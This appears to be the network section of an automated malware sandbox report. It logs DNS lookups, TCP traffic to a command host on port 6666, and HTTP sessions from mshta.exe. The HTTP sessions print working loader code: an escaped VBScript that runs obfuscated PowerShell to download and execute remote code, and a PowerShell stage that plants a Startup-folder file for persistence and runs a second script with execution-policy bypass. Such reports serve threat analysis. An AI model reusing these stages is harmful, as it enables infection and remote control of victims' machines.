                                                              Feb 27, 2021 19:18:22.108287096 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108324051 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108335972 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108372927 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108409882 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108416080 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108455896 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108491898 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108494997 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108534098 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108571053 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108588934 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108609915 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108634949 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108647108 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108695984 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108711958 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108741045 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108778954 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108817101 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108829021 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108855009 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108875990 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108894110 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108932018 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108968973 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109005928 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109015942 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109060049 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109080076 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109097958 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109126091 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109137058 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109175920 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109213114 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109217882 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109252930 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109287977 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109289885 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109390974 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.156676054 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.156718969 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.156802893 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.182998896 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183054924 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183092117 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183129072 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.183132887 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183171034 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183177948 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.183221102 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183263063 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183274031 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.183295965 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183370113 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:27.038049936 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:27.038253069 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:39.274830103 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.331427097 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:39.331532001 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.387257099 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.460581064 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:39.460616112 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:39.460695982 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.467335939 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.527411938 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:39.577558041 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:42.635688066 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:42.732952118 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:42.733083010 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:42.829991102 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.358736992 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.455893040 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.459162951 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.516571999 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.570653915 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.628478050 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.671900034 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.846848011 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.942944050 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.943037987 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:55.039072037 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:57.508256912 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:57.562798977 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:57.620819092 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:57.672173977 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:05.881107092 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:05.977983952 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:05.978168964 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.035717010 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:06.079149008 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.135289907 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:06.188462973 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.215171099 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.312786102 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:06.313237906 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.410816908 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:17.319277048 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.415915012 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:17.416207075 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.475191116 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:17.517607927 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.574299097 CET666649725193.23.3.13192.168.2.4
Feb 27, 2021 19:19:17.626949072 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:17.630496979 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:17.726949930 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:17.727308035 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:17.823947906 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:27.508063078 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:27.555572987 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:27.611888885 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:27.658931017 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:28.782193899 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:28.879925013 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:28.880305052 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:28.938060045 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:28.987281084 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:29.043603897 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:29.096914053 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:29.099689007 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:29.196899891 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:29.197065115 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:29.293797970 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:40.262342930 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:40.358700037 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:40.361057997 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:40.418344021 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:40.472434998 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:40.528841019 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:40.581787109 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:40.710248947 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:40.807712078 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:40.807905912 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:40.906759977 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:51.767956018 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:51.864626884 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:51.868057966 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:51.925272942 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:51.973448992 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:52.029681921 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:52.077583075 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:52.174513102 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:52.174890041 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:52.271750927 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:54.617650032 CET  49715        443        192.168.2.4  207.241.228.153
Feb 27, 2021 19:19:57.505597115 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:57.552081108 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:19:57.608386040 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:19:57.661479950 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:02.224596024 CET  49721        80         192.168.2.4  212.64.222.172
Feb 27, 2021 19:20:02.536655903 CET  49721        80         192.168.2.4  212.64.222.172
Feb 27, 2021 19:20:03.146210909 CET  49721        80         192.168.2.4  212.64.222.172
Feb 27, 2021 19:20:03.260411024 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:03.356833935 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:03.357135057 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:03.414704084 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:03.458739042 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:03.515002966 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:03.550787926 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:03.646524906 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:03.647007942 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:03.742614985 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:04.349339962 CET  49721        80         192.168.2.4  212.64.222.172
Feb 27, 2021 19:20:06.755719900 CET  49721        80         192.168.2.4  212.64.222.172
Feb 27, 2021 19:20:11.569102049 CET  49721        80         192.168.2.4  212.64.222.172
Feb 27, 2021 19:20:14.699502945 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:14.795550108 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:14.795671940 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:14.853321075 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:14.897001028 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:14.953342915 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:15.006423950 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:15.025710106 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:15.125591040 CET  6666         49725      193.23.3.13  192.168.2.4
Feb 27, 2021 19:20:15.125842094 CET  49725        6666       192.168.2.4  193.23.3.13
Feb 27, 2021 19:20:15.221482038 CET  6666         49725      193.23.3.13  192.168.2.4

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Feb 27, 2021 19:17:54.911070108 CET  51025        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:17:54.979348898 CET  53           51025      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:01.357744932 CET  61516        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:01.406991959 CET  53           61516      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:02.354219913 CET  49182        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:02.417057991 CET  53           49182      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:02.569791079 CET  59920        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:02.621450901 CET  53           59920      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:04.131393909 CET  57458        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:04.183351994 CET  53           57458      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:05.146290064 CET  50579        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:05.195327044 CET  53           50579      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:06.022663116 CET  51703        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:06.247833014 CET  53           51703      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:06.583969116 CET  65248        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:06.632795095 CET  53           65248      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:08.290199995 CET  53723        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:08.347462893 CET  53           53723      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:09.299889088 CET  64646        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:09.348550081 CET  53           64646      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:12.235332012 CET  65298        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:12.284215927 CET  53           65298      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:13.582906008 CET  59123        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:13.645466089 CET  53           59123      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:14.261471987 CET  54531        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:14.313458920 CET  53           54531      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:15.252944946 CET  49714        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:15.301991940 CET  53           49714      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:16.485549927 CET  58028        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:16.534528971 CET  53           58028      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:18.977446079 CET  53097        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:19.026290894 CET  53           53097      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:20.733107090 CET  49257        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:20.782078028 CET  53           49257      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:21.598244905 CET  62389        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:21.658826113 CET  53           62389      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:21.893693924 CET  49910        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:21.945417881 CET  53           49910      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:23.064929962 CET  55854        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:23.117965937 CET  53           55854      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:24.581084013 CET  64549        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:24.630065918 CET  53           64549      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:39.088138103 CET  63153        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:39.265434027 CET  53           63153      8.8.8.8      192.168.2.4
Feb 27, 2021 19:18:40.135756969 CET  52991        53         192.168.2.4  8.8.8.8
Feb 27, 2021 19:18:40.184736967 CET  53           52991      8.8.8.8      192.168.2.4

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class
Feb 27, 2021 19:18:02.354219913 CET  192.168.2.4  8.8.8.8  0x9d51    Standard query (0)  ahmedadel.work           A (IP address)  IN (0x0001)
Feb 27, 2021 19:18:06.022663116 CET  192.168.2.4  8.8.8.8  0x85ca    Standard query (0)  ahmedadel.work           A (IP address)  IN (0x0001)
Feb 27, 2021 19:18:13.582906008 CET  192.168.2.4  8.8.8.8  0x7f6     Standard query (0)  ia801503.us.archive.org  A (IP address)  IN (0x0001)
Feb 27, 2021 19:18:21.598244905 CET  192.168.2.4  8.8.8.8  0xb423    Standard query (0)  ahmedadel.work           A (IP address)  IN (0x0001)
Feb 27, 2021 19:18:39.088138103 CET  192.168.2.4  8.8.8.8  0x8cd8    Standard query (0)  clayroot2016.linkpc.net  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                     CName  Address          Type            Class
Feb 27, 2021 19:18:02.417057991 CET  8.8.8.8    192.168.2.4  0x9d51    No error (0)  ahmedadel.work                  212.64.222.172   A (IP address)  IN (0x0001)
Feb 27, 2021 19:18:06.247833014 CET  8.8.8.8    192.168.2.4  0x85ca    No error (0)  ahmedadel.work                  212.64.222.172   A (IP address)  IN (0x0001)
Feb 27, 2021 19:18:13.645466089 CET  8.8.8.8    192.168.2.4  0x7f6     No error (0)  ia801503.us.archive.org         207.241.228.153  A (IP address)  IN (0x0001)
Feb 27, 2021 19:18:21.658826113 CET  8.8.8.8    192.168.2.4  0xb423    No error (0)  ahmedadel.work                  212.64.222.172   A (IP address)  IN (0x0001)
Feb 27, 2021 19:18:39.265434027 CET  8.8.8.8    192.168.2.4  0x8cd8    No error (0)  clayroot2016.linkpc.net         193.23.3.13      A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

• ahmedadel.work

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.4  49706        212.64.222.172  80                C:\Windows\System32\mshta.exe

Timestamp                            kBytes transferred  Direction  Data
Feb 27, 2021 19:18:02.509869099 CET  328                 OUT        GET /cairo/Encoding.txt HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ahmedadel.work
Connection: Keep-Alive
Feb 27, 2021 19:18:02.587268114 CET  329                 IN         HTTP/1.1 200 OK
Date: Sat, 27 Feb 2021 19:00:52 GMT
Server: Apache
Last-Modified: Fri, 26 Feb 2021 14:18:10 GMT
ETag: "247-5bc3df01925b7"
Accept-Ranges: bytes
Content-Length: 583
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Data Ascii: <script language=javascript>document.write(unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20var_func%28%29%0ADim%20ESRDTYGUHGYTFRHTCJVY%0Aset%20ESRDTYGUHGYTFRHTCJVY%20%3D%20CreateObject%28%22Wscript.Shell%22%29%0AESRDTYGUHGYTFRHTCJVY.run%20%22powershell%20%24c1%3D%27%28New-Object%20Net.We%27%3B%20%24c4%3D%27bClient%29.Downlo%27%3B%20%24c3%3D%27adString%28%27%27http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Join%20%27%27%29%7CI%60E%60X%22%2C0%0AEnd%20Function%0Avar_func%0Aself.close%0A%3C/script%3E%0A'))</script>


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.4  49710        212.64.222.172  80                C:\Windows\System32\mshta.exe

Timestamp                            kBytes transferred  Direction  Data
Feb 27, 2021 19:18:06.335442066 CET  364                 OUT        GET /cairo/ALL.txt HTTP/1.1
Host: ahmedadel.work
Connection: Keep-Alive
Feb 27, 2021 19:18:06.407830000 CET  365                 IN         HTTP/1.1 200 OK
Date: Sat, 27 Feb 2021 19:00:55 GMT
Server: Apache
Last-Modified: Fri, 26 Feb 2021 14:17:06 GMT
ETag: "236-5bc3dec4044c9"
Accept-Ranges: bytes
Content-Length: 566
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
Data Ascii (line breaks restored from the CRLF bytes of the response body):
Function HBar
{
$p = 'C:\Users\' + $env:UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
$ps1 = 'C:\Users\Public\'


start-sleep -s 7

if((New-Object System.Net.WebClient).DownloadFile('https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt', $p + 'Run.hta')){
}
start-sleep -s 7
if((New-Object System.Net.WebClient).DownloadFile('http://ahmedadel.work/cairo/Server.txt' , $ps1 + 'Microsoft.ps1')){
}
start-sleep -s 7
powershell -windo 1 -noexit -exec bypass -file "C:\Users\Public\Microsoft.ps1"
}
IEX HBar


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.4  49721        212.64.222.172  80                C:\Windows\System32\mshta.exe

Timestamp                            kBytes transferred  Direction  Data
Feb 27, 2021 19:18:21.733598948 CET  664                 OUT        GET /cairo/Server.txt HTTP/1.1
Host: ahmedadel.work
Connection: Keep-Alive
Feb 27, 2021 19:18:21.807632923 CET  666                 IN         HTTP/1.1 200 OK
Date: Sat, 27 Feb 2021 19:01:11 GMT
Server: Apache
Last-Modified: Fri, 26 Feb 2021 14:14:58 GMT
ETag: "378df-5bc3de49f8e36"
Accept-Ranges: bytes
Content-Length: 227551
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8
                                                              Feb 27, 2021 19:18:21.807924986 CET675INData Raw: 42 69 68 46 7c 7c 7c 47 45 67 6b 52 43 68 45 4c 45 51 77 61 48 52 73 47 4b 45 55 7c 7c 7c 59 53 44 42 45 4a 45 51 6f 52 43 78 73 66 44 42 77 47 4b 45 55 7c 7c 7c 59 53 43 78 45 4d 45 51 6b 52 43 68 77 66 45 52 30 47 4b 45 55 7c 7c 7c 59 53 43 68
                                                              Data Ascii: BihF|||GEgkRChELEQwaHRsGKEU|||YSDBEJEQoRCxsfDBwGKEU|||YSCxEMEQkRChwfER0GKEU|||YSChELEQwRCR0fFh4GKEU|||YSCREKEQsRDB4dHwkGKEU|||YSDBEJEQoRCx8JHwwfCgYoRQ||BhILEQwRCREKHwofER8LBihF|||GEgoRCxEMEQkfCx8WHwwGKEU|||YSCREKEQsRDB8MHR8NBihF|||GEgwRCREKEQs
                                                              Feb 27, 2021 19:18:21.807965040 CET677INData Raw: 45 4b 45 51 73 52 44 42 34 63 48 7a 6b 47 4b 45 67 7c 7c 7c 59 53 44 42 45 4a 45 51 6f 52 43 78 38 50 48 77 6f 66 4f 67 59 6f 53 7c 7c 7c 42 68 49 4c 45 51 77 52 43 52 45 4b 48 42 38 50 48 7a 73 47 4b 45 67 7c 7c 7c 59 53 43 68 45 4c 45 51 77 52
                                                              Data Ascii: EKEQsRDB4cHzkGKEg|||YSDBEJEQoRCx8PHwofOgYoS|||BhILEQwRCREKHB8PHzsGKEg|||YSChELEQwRCR8NHxUfP|YoS|||BhIJEQoRCxEMGhwfPQYoS|||BhIMEQkRChELHwsfCh8+BihI|||GEgsRDBEJEQoYHw8fPwYoS|||BhIKEQsRDBEJHwkfFR9|BihI|||GEQkREFgTCREKERFYEwoRCxESWBMLEQwRE1gTDBENF
                                                              Feb 27, 2021 19:18:21.808002949 CET678INData Raw: 48 77 30 52 42 42 79 52 6e 7c 6b 66 44 78 45 45 48 5a 47 63 4b 45 73 7c 7c 7c 59 54 42 52 45 46 46 32 39 46 7c 7c 7c 4b 45 51 55 49 43 57 39 47 7c 7c 7c 4b 45 77 5a 7a 52 77 7c 7c 43 68 4d 48 45 51 63 52 42 68 64 7a 53 7c 7c 7c 43 68 4d 49 45 51
                                                              Data Ascii: Hw0RBByRn|kfDxEEHZGcKEs|||YTBREFF29F|||KEQUICW9G|||KEwZzRw||ChMHEQcRBhdzS|||ChMIEQgHFgeOaW9J|||KEQhvSg||ChEHb0s|||q|KQ||BBEHb0w|||oRCG9M|||KBm9N|||Kfio|||SOaToZ||||fic|||QoVQ||Bm9O|||KKFY|||a|Kg||BBYTCRqNHw|||RMLEQsWfik|||QCkZwRCxd+KQ||B|IXWJG
                                                              Feb 27, 2021 19:18:21.881756067 CET681INData Raw: 67 7c 7c 43 73 67 7c 7c 7c 74 47 77 7c 7c 31 42 77 7c 7c 4f 63 50 7c 7c 42 5a 45 7c 7c 7c 36 53 6f 7c 7c 48 59 4b 7c 7c 42 55 44 67 7c 7c 48 69 6b 7c 7c 48 63 52 7c 7c 7c 66 7c 51 7c 7c 51 43 6f 7c 7c 4c 7c 47 7c 7c 7c 68 4a 7c 7c 7c 4b 42 55 7c
                                                              Data Ascii: g||Csg|||tGw||1Bw||OcP||BZE|||6So||HYK||BUDg||Hik||HcR|||f|Q||QCo||L|G|||hJ|||KBU||B4j||BYC|||WyY||HkP||D8LQ||IxQ||E0f||CYFQ||bwI||FUW||DCI|||PxQ||P0J||BGBw||Ly8||GEc|||3BQ||mwc||FYF||C9|Q||dQs||LYS||BlBw||two||GQb||CwLg||3RQ||JUc||BhDw||rSo||


                                                              HTTPS Packets

                                                              Timestamp: Feb 27, 2021 19:18:14.089788914 CET
                                                              Source IP: 207.241.228.153
                                                              Source Port: 443
                                                              Dest IP: 192.168.2.4
                                                              Dest Port: 49715
                                                              JA3 SSL Client Fingerprint: 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
                                                              JA3 SSL Client Digest: 54328bd36c14bd82ddaa0c04b25ed9ad
                                                              Certificate chain (Subject / Issuer / Not Before / Not After):
